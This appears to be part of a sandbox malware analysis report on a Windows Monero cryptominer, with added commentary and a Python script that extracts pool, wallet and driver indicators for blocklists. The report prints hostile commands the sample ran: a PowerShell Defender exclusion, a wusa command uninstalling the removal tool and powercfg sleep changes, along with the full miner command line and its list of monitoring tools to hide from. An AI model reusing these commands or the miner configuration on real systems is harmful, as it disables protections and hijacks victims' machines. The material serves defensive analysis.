              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical entry reported 190 times)
              Source: C:\Windows\System32\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported twice)
              Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE (reported twice)
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BEMMOLI3KFUJQQPIDNRXGWERQ4E" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="JVOCDAUQVWBP.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="QPWMKTKIKRNKQDXL"
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BEMMOLI3KFUJQQPIDNRXGWERQ4E--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=JVOCDAUQVWBP.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=QPWMKTKIKRNKQDXL
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OSX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BEMMOLI3KFUJQQPIDNRXGWERQ4E" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="JVOCDAUQVWBP.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="QPWMKTKIKRNKQDXL"
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: K.$TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLLL
              Source: svchost.exe, 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEQPWMKTKIKRNKQDXL
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: K.$TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FPROCESSHACKER.EXE;Q
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
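The argument string recovered from svchost.exe memory is the most useful artefact in this report: it carries the pool (xmr-eu1.nanopool.org:10343 over TLS), the wallet, the name of the WinRing0 driver dropped to C:\Windows\Temp, the monitoring tools the miner pauses for, and the idle thresholds. The --cinit-* switches are not stock XMRig options; they follow the naming of the SilentCryptoMiner wrapper around XMRig, which is a family hint worth recording. Two points matter when lifting IOCs from it. First, the report shows the string both with spaces and quotes and with the separators dropped, so a parser has to split on the "--" boundary rather than on whitespace. Second, the sandbox prints these memory strings in upper case, and a Monero address is case-sensitive Base58, so the wallet as printed is not the address the miner uses; it has to be taken from the memory dump. The following is an added example, not part of the Joe Sandbox report and not the sample's code; both input strings are copied from the findings above, and the address check is a shape check only (length, prefix, Base58 alphabet), not a checksum validation.

```python
"""Recover miner IOCs from the argument string found in svchost.exe memory.

Added example, not part of the Joe Sandbox report. Two copies of the string
are embedded below as the report prints them: one with spaces and quotes, one
where string extraction dropped the separators. The report renders memory
strings in upper case, which matters for the wallet (Base58 is case
sensitive); the address check is expected to flag that copy.
"""
from __future__ import annotations

from dataclasses import dataclass

# Wallet exactly as printed in the report (upper-cased by the sandbox).
WALLET_AS_PRINTED = ("43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BE"
                     "MMOLI3KFUJQQPIDNRXGWERQ4E")

SPACED_FORM = (
    'X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="' + WALLET_AS_PRINTED + '" --PASS="" '
    '--CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="JVOCDAUQVWBP.SYS" --RANDOMX-NO-RDMSR '
    '--CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" '
    '--CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 '
    '--CINIT-IDLE-CPU=90 --CINIT-ID="QPWMKTKIKRNKQDXL"')
COLLAPSED_FORM = (
    "SVCHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=" + WALLET_AS_PRINTED +
    "--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=JVOCDAUQVWBP.SYS--RANDOMX-NO-RDMSR"
    "--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE"
    "--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90"
    "--CINIT-ID=QPWMKTKIKRNKQDXL")

# Base58 alphabet used by Monero addresses: no 0, O, I or l.
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def parse_args(s: str) -> dict[str, str | bool]:
    """Split on the '--' option boundary (never inside a value here); flags become True."""
    out: dict[str, str | bool] = {}
    for part in s.split("--")[1:]:            # drop whatever precedes the first option
        key, sep, val = part.partition("=")
        out[key.strip().lower()] = val.strip().strip('"') if sep else True
    return out


def monero_address_status(addr: str) -> str:
    """Shape check: 95 chars, prefix '4' (standard) or '8' (subaddress), Base58 charset."""
    if len(addr) != 95 or addr[0] not in "48":
        return "wrong length or prefix"
    if not set(addr) <= BASE58:
        return "not base58 (case-normalised copy; take it from the dump)"
    return "plausible"


@dataclass(frozen=True)
class MinerIOCs:
    pool_host: str
    pool_port: int
    tls: bool
    wallet: str
    wallet_status: str
    driver: str
    stealth_targets: tuple[str, ...]
    idle_wait_s: int
    idle_cpu_pct: int


def extract_iocs(s: str) -> MinerIOCs:
    """Normalise the parsed options into the fields a blocklist or hunt would use."""
    a = parse_args(s)
    host, _, port = str(a["url"]).rpartition(":")
    wallet = str(a.get("user", ""))
    targets = str(a.get("cinit-stealth-targets", ""))
    return MinerIOCs(
        pool_host=host.lower(), pool_port=int(port), tls=bool(a.get("tls", False)),
        wallet=wallet, wallet_status=monero_address_status(wallet),
        driver=str(a.get("cinit-winring", "")).lower(),
        stealth_targets=tuple(t.lower() for t in targets.split(",") if t),
        idle_wait_s=int(a.get("cinit-idle-wait", 0)),
        idle_cpu_pct=int(a.get("cinit-idle-cpu", 0)),
    )


if __name__ == "__main__":
    print(extract_iocs(COLLAPSED_FORM))
```

Both renderings yield the same IOC record, and the wallet comes back flagged because the upper-cased copy contains O and I, which are outside the Base58 alphabet. The stealth-target list is also the list of process names the miner watches for, which is why a live host will show the miner's CPU use dropping the moment Task Manager or Process Explorer opens.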
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported twice)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4990
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4826
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6514
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3083
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Dropped PE file which has not been started: C:\Windows\Temp\jvocdauqvwbp.sys
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | API coverage: 3.2 %
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | API coverage: 3.2 %
              Source: C:\Windows\System32\conhost.exe | API coverage: 1.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072 | Thread sleep count: 4990 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072 | Thread sleep count: 4826 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640 | Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 | Thread sleep count: 6514 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 | Thread sleep count: 3083 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424 | Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (reported twice)
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: conhost.exe, 00000023.00000002.2735776267.000001A4C7BC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C7@j!V_s~Kpp9mSqP[[bK/km@TARMMnK i}d;mi^9ZGeDyPuYVK^P^X:D/1G{46Alw[s>YEcek\Bcvku,*Lso`G9kq<06fb}@zzGiJ3^;bM\KkEV#mg?@qNd~VRo*:v]V[k_;v[ZOnIs[GW#cjBgbrn@HsOBt0[G_\_qiwlYLpn}sMbgq-9@h}R:Wo[gnVsAnU}N[|^iaBJjWLPK {LJ\r2`gmLACLKDs}Eg_uN:]jCvbF[p%BHS?K]ghmZOBjRKgHAh%c@Xwv@EgOG}NbY:a~@s_kF<nRDj|]m`}YeNVWQEMuHqxm\aNs|\obKAYPp~?|JB3sc^[,no5n.IAA>c\\@c?B]gTlbWlkf=?cR!JUrIry[x^)_9rN~HA7oQrtg!w*oo;C[AM(#k[z6a#w}s2LZ{aSKn{h8fF3Nqd]\=Llqf4uNDQ]YC\mh
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1561494996.0000020A9D060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000026.00000002.2736753633.0000020A9D013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: 0_2_00007FF75E8E1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF75E8E1160
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: 24_2_00007FF6CD201160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF6CD201160
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 140000000 protect: page read and write
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Thread register set: target process: 5820
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Thread register set: target process: 5588
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: svchost.exe, 00000026.00000002.2736952891.0000020A9D09D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 11 Windows Service | 11 Windows Service | 1 Masquerading | OS Credential Dumping | 321 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 211 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
